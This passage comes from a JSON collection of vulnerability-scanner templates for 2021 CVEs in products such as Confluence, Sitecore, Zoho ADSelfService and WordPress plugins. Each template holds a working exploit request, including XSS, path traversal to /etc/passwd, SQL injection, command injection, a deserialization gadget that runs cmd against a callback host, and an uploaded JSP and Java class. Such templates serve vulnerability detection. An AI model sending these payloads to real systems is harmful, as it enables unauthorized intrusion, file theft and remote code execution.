d89d3c803295cc924699c93eb762e75d42178eb3fe8b42a5093075c71","62e4cc014d9d96f9cbf443186289ffd9c41bdfe951565324891dcf38bcca5a51","64e10bc92a379103a268a90a7863903eacb56843d8990fff8410f9f109c3b87a","655ad8aea57bdaaad10ff208c7f7aa88c9af89a834c0041ffc18c928cc3eab1f","67ac5da9c95d82e894c9efe975335f9e8bdae64967f33652cd9a97b5449216d2","69a1b8e44ba8b277e3c93911be41b0f588ac7275b91a184c6a3f448550ca28ca","6ae610d783ba9a520b82263f49d2907a52090fecb3ac37819cea12b67e6d94fb","70ce56efa7e602d4b127087b0eca064681ecdd49b57d86665da8b081da39408b","7310c45f08c5414036292b0c4026f281a73cf8a01af82a81257dd343f378bbb5","73a21594461cbc9a2fb00fc6f94aec1a33ccf435a7d008d764ddd0482e08fc8d","77566acc818458515231d0a82c131a42890d771ea998b9f578dc38e0eb7e517f","78812856e55613c6803ecb31cc1864b7555bf7f0126d1dfa6f37376d37d3aeab","79837fd1939f90d58cc5a842a81120e8cecbc03484362e88081ebf3b7e3830e9","7b1dcbacca4f585e2cb98f0d48f008acfec617e473ba4fd88de36b946570b8b9","7f1c7b2bfaa6152740d453804e7aa380077636cad101005ed85e70990ec20ec5","81c5f2c7b2c0b0abaeb59585f36904031c21b1702c24349404df52834fbd7ad3","83dc10f687305b22e602ba806619628a90bd4d89be7c626176a0efec173ecff1","93ebf32a4bd988b808c2329308847edd77e752b38becc995970079a6d586c39b","969119f639d0837f445a10ced20d3a82d2ea69d682a4e74f39a48a4e7b443d5e","9b4e140fad97320405244676f1a329679808e02c854077f73422bd8b7797476b","9c095c833db4364caae1659f4e4dcb78da3b5ec5e9a507154832126b0fe0f08e","a0c92bafde7d93e87af3bc2797125cba613018240a9f5305ff949be8a1b16528","a9308f85e95b00007892d451fd9f6beabcd8792b4c5f8cd7524ba7e941d479c9","ac9b38e86b6c87bf8db038ae23da3a5f17a6c391b3a54ad1e727136141a7d4f5","ae0edd232df6f579e19ea52115d35977f8bdbfa9958e0aef2221d62f3a39e7d8","aeddf31361633b3d1196c6483f25c484855e0f243e7f7e62686a4de9e10ec03b","b50bfeb87fe7bb245b31a0423ccfd866ca974bc5943e568ce47efb4cd221d711","b64a1277a08c2901915525143cd0b62d81a37de0a64ec135800f519cb0836445","bb1565ffd7c937bea412482ed9136c6057be50356f1f901379586989b4dfe2ca","be9a23d3021354ec649bc823b23eab01ed235a4eb730fd2f4f7cdb2a6dee453a","bec9544b57b8b2b515e855779735ad31c3eacf65d615b4bfbd574549735111e7","bf1ba5d5d3395adc5bad6f17cc3cb21b3fb29d3e3471a5b260e0bc5ec7a57bc4","bf1c397958ee5114e8f1dadc98fa9c9d7ddb031a4c3c030fa00c315384456218","c8d8d30d89b00098edab024579a3f3c0df2613a29ebcd57cdb9a9062675558e4","c923fa3e71e104d50615978c1ab9fcfccfcbada9e8df638fc27bf4d4eb72d78c","d0850f616c5b4f09a7ff319701bce0460ffc17ca0349ad2cf7808b868688cf71","d161b6e25db66456f8e0603de5132d1ff90f9388d0a0305d2d073a67fd229ddb","d56f0577fbbbd6f159e9be00b274270cb25b60a7809871a6a572783b533f5a3c","d812b9bf6957fafe35951054b9efc5be6b10c204c127aa5a048506218c34e40f","dc6b3e9c0fad345e7c45a569f4c34c3e94730c33743ae8ca055aa6669ad6ac56","def1880ada798c68ee010ba2193f53a2c65a8981871a634ae7e18ccdcd503fa3","e2578590390a9eb10cd65d130e36503fccb40b3921c65c160bb06943b2e3751a","e4b6f040fe2e04c86ed1f969fc72710a844fe30c3501b868cb519d98d1fe3fd0","eb078ffe61726e3898dc9d01ea7955809778bde5be3677d907cbd3b48854e687","ec9dfedd7bd44754668b208858a31b83489d5474f7606294f6cc0128bb218c6d","ed4780bb05c30e3c145419d06ad0ab3f48bd3004a90fb99601f40c5b6e1d90fd","ef53a4f4523a4a0499fb892d9fb5ddb89318538fef33a74ce0bf54d25777ea83","f154ef27cf0f1383ba4ca59531058312b44c84d40938bc8758827023db472812","f7d1309f3caef67cb63bd114c85e73b323a97d145ceca7d6ef3c1c010078c649","f9ab217549b223c55fa310f2007a8f5685f9596c579f5c5526e7dcb204ba0e11"],"condition":"or"}],"extractors":[{"type":"regex","group":1,"regex":["(?:application-)(\\S{64})(?:\\.css)"]}]}]},{"id":"CVE-2021-3654","info":{"name":"Nova noVNC - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}//interact.sh/%2f.."],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]},{"type":"status","status":[302,301]}]}]},{"id":"CVE-2021-40150","info":{"name":"Reolink E1 Zoom Camera <=3.0.0.716 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/conf/nginx.conf"],"matchers-condition":"and","matchers":[{"type":"word","words":["server","listen","fastcgi"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41951","info":{"name":"Resourcespace - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/wordpress_sso/pages/index.php?wordpress_user=%3Cscript%3Ealert(1)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["TEST<script>alert(1)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-37304","info":{"name":"Jeecg Boot <= 2.4.5 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/jeecg-boot/actuator/httptrace/"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"traces\":[","\"headers\"","\"request\":{"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-26084","info":{"name":"Confluence Server - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /{{path}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nqueryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb\n"],"payloads":{"path":["pages/createpage-entervariables.action?SpaceKey=x","pages/createpage-entervariables.action","confluence/pages/createpage-entervariables.action?SpaceKey=x","confluence/pages/createpage-entervariables.action","wiki/pages/createpage-entervariables.action?SpaceKey=x","wiki/pages/createpage-entervariables.action","pages/doenterpagevariables.action","pages/createpage.action?spaceKey=myproj","pages/templates2/viewpagetemplate.action","pages/createpage-entervariables.action","template/custom/content-editor","templates/editor-preload-container","users/user-dark-features"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"aaaa{140592=null}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-28151","info":{"name":"Hongdian H8922 3.0.5 - Remote Command Injection","severity":"high"},"requests":[{"raw":["POST /tools.cgi HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic Z3Vlc3Q6Z3Vlc3Q=\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/tools.cgi\n\nop_type=ping&destination=%3Bid\n","POST /tools.cgi HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic YWRtaW46YWRtaW4=\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/tools.cgi\n\nop_type=ping&destination=%3Bid\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html","application/x-www-form-urlencoded"],"condition":"or"},{"type":"regex","regex":["uid=\\d+\\(([^)]+)\\) gid=\\d+\\(([^)]+)\\)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22145","info":{"name":"Elasticsearch 7.10.0-7.13.3 - Information Disclosure","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/_bulk"],"body":"@\n","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["root_cause","truncated","reason"],"condition":"and"},{"type":"status","status":[400]}]}]},{"id":"CVE-2021-20124","info":{"name":"Draytek VigorConnect 6.0-B3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../etc/passwd","{{BaseURL}}/ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../windows/win.ini"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"regex","regex":["root:.*:0:0:","for 16-bit app support"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-30128","info":{"name":"Apache OFBiz <17.12.07 - Arbitrary Code Execution","severity":"critical"},"requests":[{"raw":["POST /webtools/control/SOAPService HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:ser=\"http://ofbiz.apache.org/service/\">\n  <soapenv:Header/>\n    <soapenv:Body>\n      <ser>\n        <map-Map>\n          <map-Entry>\n            <map-Key>\n              <cus-obj>{{generate_java_gadget(\"dns\", \"https://{{interactsh-url}}\", \"hex\")}}</cus-obj>\n            </map-Key>\n          <map-Value>\n        <std-String/>\n        </map-Value>\n        </map-Entry>\n      </map-Map>\n      </ser>\n    </soapenv:Body>\n</soapenv:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["value=\"errorMessage\""]}]}]},{"id":"CVE-2021-27670","info":{"name":"Appspace 6.2.4 - Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/core/proxy/jsonprequest?objresponse=false&websiteproxy=true&escapestring=false&url=http://oast.live"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<h1> Interactsh Server </h1>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-30151","info":{"name":"Sidekiq <=6.2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/sidekiq/queues/\"onmouseover=\"alert(document.domain)\""],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onmouseover=\"alert(document.domain)"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41174","info":{"name":"Grafana 8.0.0 <= v.8.2.2 - Angularjs Rendering Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/dashboard/snapshot/%7B%7Bconstructor.constructor(%27alert(document.domain)%27)()%7D%7D?orgId=1"],"skip-variables-check":true,"matchers-condition":"and","matchers":[{"type":"word","words":["Grafana","frontend_boot_js_done_time_seconds"],"condition":"and"},{"type":"regex","regex":["\"subTitle\":\"Grafana (v8\\.(?:(?:1|0)\\.[0-9]|2\\.[0-2]))"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["\"subTitle\":\"Grafana ([a-z0-9.]+)"]}]}]},{"id":"CVE-2021-20137","info":{"name":"Gryphon Tower - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/luci/site_access/?url=%22%20onfocus=alert(document.domain)%20autofocus=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["onfocus=alert(document.domain) autofocus=1>","Send Access Request URL"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-26247","info":{"name":"Cacti - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/auth_changepassword.php?ref=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-39433","info":{"name":"BIQS IT Biqs-drive v1.83 Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/download/index.php?file=../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24288","info":{"name":"WordPress AcyMailing <7.5.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?page=acymailing_front&ctrl=frontusers&noheader=1&user[email]=example@mail.com&ctrl=frontusers&task=subscribe&option=acymailing&redirect=https://interact.sh&ajax=0&acy_source=widget%202&hiddenlists=1&acyformname=formAcym93841&acysubmode=widget_acym"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2021-39211","info":{"name":"GLPI 9.2/<9.5.6 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax/telemetry.php","{{BaseURL}}/glpi/ajax/telemetry.php"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"uuid\":","\"glpi\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40539","info":{"name":"Zoho ManageEngine ADSelfService Plus v6113 - Unauthenticated Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /./RestAPI/LogonCustomization HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=8b1ab266c41afb773af2e064bc526458\n\n--8b1ab266c41afb773af2e064bc526458\nContent-Disposition: form-data; name=\"methodToCall\"\n\nunspecified\n--8b1ab266c41afb773af2e064bc526458\nContent-Disposition: form-data; name=\"Save\"\n\nyes\n--8b1ab266c41afb773af2e064bc526458\nContent-Disposition: form-data; name=\"form\"\n\nsmartcard\n--8b1ab266c41afb773af2e064bc526458\nContent-Disposition: form-data; name=\"operation\"\n\nAdd\n--8b1ab266c41afb773af2e064bc526458\nContent-Disposition: form-data; name=\"CERTIFICATE_PATH\"; filename=\"ws.jsp\"\n\n<%@ page import=\"java.util.*,java.io.*\"%>\n<%@ page import=\"java.security.MessageDigest\"%>\n<%\nString cve = \"CVE-2021-40539\";\nMessageDigest alg = MessageDigest.getInstance(\"MD5\");\nalg.reset();\nalg.update(cve.getBytes());\nbyte[] digest = alg.digest();\nStringBuffer hashedpasswd = new StringBuffer();\nString hx;\nfor (int i=0;i<digest.length;i++){\n  hx =  Integer.toHexString(0xFF & digest[i]);\n  if(hx.length() == 1){hx = \"0\" + hx;}\n  hashedpasswd.append(hx);\n}\nout.println(hashedpasswd.toString());\n%>\n--8b1ab266c41afb773af2e064bc526458--\n","POST /./RestAPI/LogonCustomization HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=43992a07d9a30213782780204a9f032b\n\n--43992a07d9a30213782780204a9f032b\nContent-Disposition: form-data; name=\"methodToCall\"\n\nunspecified\n--43992a07d9a30213782780204a9f032b\nContent-Disposition: form-data; name=\"Save\"\n\nyes\n--43992a07d9a30213782780204a9f032b\nContent-Disposition: form-data; name=\"form\"\n\nsmartcard\n--43992a07d9a30213782780204a9f032b\nContent-Disposition: form-data; name=\"operation\"\n\nAdd\n--43992a07d9a30213782780204a9f032b\nContent-Disposition: form-data; name=\"CERTIFICATE_PATH\"; filename=\"Si.class\"\n\n{{hex_decode('CAFEBABE0000003400280D0A000C00160D0A0017001807001908001A08001B08001C08001D08001E0D0A0017001F0700200700210700220100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100083C636C696E69743E01000D0A537461636B4D61705461626C6507002001000D0A536F7572636546696C6501000753692E6A6176610C000D0A000E0700230C002400250100106A6176612F6C616E672F537472696E67010003636D640100022F63010004636F707901000677732E6A737001002A2E2E5C776562617070735C61647373705C68656C705C61646D696E2D67756964655C746573742E6A73700C002600270100136A6176612F696F2F494F457863657074696F6E01000253690100106A6176612F6C616E672F4F626A6563740100116A6176612F6C616E672F52756E74696D6501000D0A67657452756E74696D6501001528294C6A6176612F6C616E672F52756E74696D653B01000465786563010028285B4C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F50726F636573733B0021000B000C0000000000020001000D0A000E0001000F0000001D00010001000000052AB70001B10000000100100000000600010000000200080011000E0001000F00000064000500020000002BB800024B2A08BD000359031204535904120553590512065359061207535907120853B600094CA700044BB10001000000260029000D0A00020010000000120004000000050004000600260007002A00080012000000070002690700130000010014000000020015')}}\n--43992a07d9a30213782780204a9f032b--\n","POST /./RestAPI/Connection HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nmethodToCall=openSSLTool&action=generateCSR&KEY_LENGTH=1024+-providerclass+Si+-providerpath+%22..%5Cbin%22\n","GET /help/admin-guide/test.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["114f7ce498a54a1be1de1f1e5731d0ea"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27931","info":{"name":"LumisXP <10.0.0 - Blind XML External Entity Attack","severity":"critical"},"requests":[{"raw":["POST /lumis/portal/controller/xml/PageControllerXml.jsp HTTP/1.1\nHost: {{Hostname}}\n\n<?xml version=\"1.0\" ?>\n<!DOCTYPE r [\n<!ELEMENT r ANY >\n<!ENTITY xxe SYSTEM \"http://{{interactsh-url}}\">\n]>\n<method name=\"addPage\">\n<id>&xxe;</id>\n</method>\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-24926","info":{"name":"WordPress Domain Check <1.0.17 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=domain-check-profile&domain=test.foo<script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Domain Check"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27315","info":{"name":"Doctor Appointment System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 10s\nPOST /contactus.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfirstname={{randstr}}&lastname={{randstr}}&email={{randstr}}%40test.com&comment=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&submit=Send+Us\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 500","contains(body, \"Medical Management System\")"],"condition":"and"}]}]},{"id":"CVE-2021-41291","info":{"name":"ECOA Building Automation System - Directory Traversal Content Disclosure","severity":"high"},"requests":[{"raw":["GET /fmangersub?cpath=../../../../../../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"regex","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-42237","info":{"name":"Sitecore Experience Platform Pre-Auth RCE","severity":"critical"},"requests":[{"raw":["POST /sitecore/shell/ClientBin/Reporting/Report.ashx HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\n\n<?xml version=\"1.0\" ?>\n<a>\n    <query></query>\n    <source>foo</source>\n    <parameters>\n        <parameter name=\"\">\n            <ArrayOfstring z:Id=\"1\" z:Type=\"System.Collections.Generic.SortedSet`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]\" z:Assembly=\"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\"\n                xmlns=\"http://schemas.microsoft.com/2003/10/Serialization/Arrays\"\n                xmlns:i=\"http://www.w3.org/2001/XMLSchema-instance\"\n                xmlns:x=\"http://www.w3.org/2001/XMLSchema\"\n                xmlns:z=\"http://schemas.microsoft.com/2003/10/Serialization/\">\n                <Count z:Id=\"2\" z:Type=\"System.Int32\" z:Assembly=\"0\"\n                    xmlns=\"\">2</Count>\n                <Comparer z:Id=\"3\" z:Type=\"System.Collections.Generic.ComparisonComparer`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]\" z:Assembly=\"0\"\n                    xmlns=\"\">\n                    <_comparison z:Id=\"4\" z:FactoryType=\"a:DelegateSerializationHolder\" z:Type=\"System.DelegateSerializationHolder\" z:Assembly=\"0\"\n                        xmlns=\"http://schemas.datacontract.org/2004/07/System.Collections.Generic\"\n                        xmlns:a=\"http://schemas.datacontract.org/2004/07/System\">\n                        <Delegate z:Id=\"5\" z:Type=\"System.DelegateSerializationHolder+DelegateEntry\" z:Assembly=\"0\"\n                            xmlns=\"\">\n                            <a:assembly z:Id=\"6\">mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</a:assembly>\n                            <a:delegateEntry z:Id=\"7\">\n                                <a:assembly z:Ref=\"6\" i:nil=\"true\"/>\n                                <a:delegateEntry i:nil=\"true\"/>\n                                <a:methodName z:Id=\"8\">Compare</a:methodName>\n                                <a:target i:nil=\"true\"/>\n                                <a:targetTypeAssembly z:Ref=\"6\" i:nil=\"true\"/>\n                                <a:targetTypeName z:Id=\"9\">System.String</a:targetTypeName>\n                                <a:type z:Id=\"10\">System.Comparison`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]</a:type>\n                            </a:delegateEntry>\n                            <a:methodName z:Id=\"11\">Start</a:methodName>\n                            <a:target i:nil=\"true\"/>\n                            <a:targetTypeAssembly z:Id=\"12\">System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</a:targetTypeAssembly>\n                            <a:targetTypeName z:Id=\"13\">System.Diagnostics.Process</a:targetTypeName>\n                            <a:type z:Id=\"14\">System.Func`3[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]</a:type>\n                        </Delegate>\n                        <method0 z:Id=\"15\" z:FactoryType=\"b:MemberInfoSerializationHolder\" z:Type=\"System.Reflection.MemberInfoSerializationHolder\" z:Assembly=\"0\"\n                            xmlns=\"\"\n                            xmlns:b=\"http://schemas.datacontract.org/2004/07/System.Reflection\">\n                            <Name z:Ref=\"11\" i:nil=\"true\"/>\n                            <AssemblyName z:Ref=\"12\" i:nil=\"true\"/>\n                            <ClassName z:Ref=\"13\" i:nil=\"true\"/>\n                            <Signature z:Id=\"16\" z:Type=\"System.String\" z:Assembly=\"0\">System.Diagnostics.Process Start(System.String, System.String)</Signature>\n                            <Signature2 z:Id=\"17\" z:Type=\"System.String\" z:Assembly=\"0\">System.Diagnostics.Process Start(System.String, System.String)</Signature2>\n                            <MemberType z:Id=\"18\" z:Type=\"System.Int32\" z:Assembly=\"0\">8</MemberType>\n                            <GenericArguments i:nil=\"true\"/>\n                        </method0>\n                        <method1 z:Id=\"19\" z:FactoryType=\"b:MemberInfoSerializationHolder\" z:Type=\"System.Reflection.MemberInfoSerializationHolder\" z:Assembly=\"0\"\n                            xmlns=\"\"\n                            xmlns:b=\"http://schemas.datacontract.org/2004/07/System.Reflection\">\n                            <Name z:Ref=\"8\" i:nil=\"true\"/>\n                            <AssemblyName z:Ref=\"6\" i:nil=\"true\"/>\n                            <ClassName z:Ref=\"9\" i:nil=\"true\"/>\n                            <Signature z:Id=\"20\" z:Type=\"System.String\" z:Assembly=\"0\">Int32 Compare(System.String, System.String)</Signature>\n                            <Signature2 z:Id=\"21\" z:Type=\"System.String\" z:Assembly=\"0\">System.Int32 Compare(System.String, System.String)</Signature2>\n                            <MemberType z:Id=\"22\" z:Type=\"System.Int32\" z:Assembly=\"0\">8</MemberType>\n                            <GenericArguments i:nil=\"true\"/>\n                        </method1>\n                    </_comparison>\n                </Comparer>\n                <Version z:Id=\"23\" z:Type=\"System.Int32\" z:Assembly=\"0\"\n                    xmlns=\"\">2</Version>\n                <Items z:Id=\"24\" z:Type=\"System.String[]\" z:Assembly=\"0\" z:Size=\"2\"\n                    xmlns=\"\">\n                    <string z:Id=\"25\"\n                        xmlns=\"http://schemas.microsoft.com/2003/10/Serialization/Arrays\">/c nslookup {{interactsh-url}}</string>\n                    <string z:Id=\"26\"\n                        xmlns=\"http://schemas.microsoft.com/2003/10/Serialization/Arrays\">cmd</string>\n                </Items>\n            </ArrayOfstring>\n        </parameter>\n    </parameters>\n</a>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["System.ArgumentNullException"]}]}]},{"id":"CVE-2021-40856","info":{"name":"Auerswald COMfortel 1400/2600/3600 IP - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /about/../tree?action=get HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"TYPE\"","\"ITEMS\"","\"COUNT\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24947","info":{"name":"WordPress Responsive Vector Maps < 6.4.2 - Arbitrary File Read","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin-ajax.php?action=rvm_import_regions&nonce=5&rvm_mbe_post_id=1&rvm_upload_regions_file_path=/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-34643","info":{"name":"WordPress Skaut Bazar <1.3.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/options-general.php/</script><script>alert(document.domain)</script>/?page=skatubazar_option HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24495","info":{"name":"Wordpress Marmoset Viewer <1.9.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/marmoset-viewer/mviewer.php?id=http://</script><svg/onload=alert(%27{{randstr}}%27)>","{{BaseURL}}/wp-content/plugins/marmoset-viewer/mviewer.php?id=1+http://a.com%27);alert(/{{randstr}}/);marmoset.embed(%27a"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><svg/onload=alert('{{randstr}}')>","alert(/{{randstr}}/)"],"condition":"or"},{"type":"word","words":["Marmoset Viewer"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20031","info":{"name":"SonicWall SonicOS 7.0 - Open Redirect","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{randstr}}.tld\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["https://{{randstr}}.tld/auth.html","Please be patient as you are being re-directed"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41432","info":{"name":"FlatPress 1.2.1 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarykGJmx9vKsePrMkVp\n\n------WebKitFormBoundarykGJmx9vKsePrMkVp\nContent-Disposition: form-data; name=\"user\"\n\n{{username}}\n------WebKitFormBoundarykGJmx9vKsePrMkVp\nContent-Disposition: form-data; name=\"pass\"\n\n{{password}}\n------WebKitFormBoundarykGJmx9vKsePrMkVp\nContent-Disposition: form-data; name=\"submit\"\n\nLogin\n------WebKitFormBoundarykGJmx9vKsePrMkVp--\n","GET /admin.php?p=entry&action=write HTTP/1.1\nHost: {{Hostname}}\n","POST /admin.php?p=entry&action=write HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_wpnonce={{nonce}}&_wp_http_referer=%2Fadmin.php%3Fp%3Dentry%26action%3Dwrite&subject=abcd&timestamp=&entry=&attachselect=--&imageselect=--&content=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&save=Publish\n","GET /index.php/2022/10 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_4, '<p><script>alert(document.cookie)</script></p>')","contains(body_4, 'FlatPress')","contains(header_4, 'text/html')","status_code_4 == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["name=\"_wpnonce\" value=\"([0-9a-z]+)\" />"],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-34473","info":{"name":"Exchange Server - Remote Code 